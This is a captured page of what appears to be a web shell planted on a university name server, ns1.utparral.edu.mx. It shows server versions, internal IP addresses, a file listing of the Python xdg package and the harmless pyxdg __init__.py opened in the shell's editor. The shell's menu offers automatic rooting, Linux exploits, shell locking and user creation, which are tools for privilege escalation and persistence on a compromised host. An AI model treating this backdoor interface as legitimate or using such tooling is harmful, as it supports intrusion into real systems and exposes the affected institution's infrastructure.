Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
xdg /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
BaseDirectory.py
5.62
KB
-rw-r--r--
Config.py
728
B
-rw-r--r--
DesktopEntry.py
17.05
KB
-rw-r--r--
Exceptions.py
2.44
KB
-rw-r--r--
IconTheme.py
15.71
KB
-rw-r--r--
IniFile.py
13.32
KB
-rw-r--r--
__init__.py
1.06
KB
-rw-r--r--
Locale.py
2.11
KB
-rw-r--r--
MenuEditor.py
18.48
KB
-rw-r--r--
Menu.py
38.68
KB
-rw-r--r--
Mime.py
25.63
KB
-rw-r--r--
RecentFiles.py
6.04
KB
-rw-r--r--
util.py
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
__all__ = [ "BaseDirectory", "DesktopEntry", "Menu", "Exceptions", "IniFile", "IconTheme", "Locale", "Config", "Mime", "RecentFiles", "MenuEditor" ] __version__ = "0.27" # Compatibility with xdg 5 from pathlib import Path from typing import Optional, List import os from . import BaseDirectory def xdg_cache_home() -> Path: return Path(BaseDirectory.xdg_cache_home) def xdg_config_dirs() -> List[Path]: return [Path(path) for path in BaseDirectory.xdg_config_dirs] def xdg_config_home() -> Path: return Path(BaseDirectory.xdg_config_home) def xdg_data_dirs() -> List[Path]: return [Path(path) for path in BaseDirectory.xdg_data_dirs] def xdg_data_home() -> Path: return Path(BaseDirectory.xdg_data_home) def xdg_runtime_dir() -> Optional[Path]: try: return Path(os.environ['XDG_RUNTIME_DIR']) except KeyError: return None XDG_CACHE_HOME = xdg_cache_home() XDG_CONFIG_DIRS = xdg_config_dirs() XDG_CONFIG_HOME = xdg_config_home() XDG_DATA_DIRS = xdg_data_dirs() XDG_DATA_HOME = xdg_data_home() XDG_RUNTIME_DIR = xdg_runtime_dir()
Close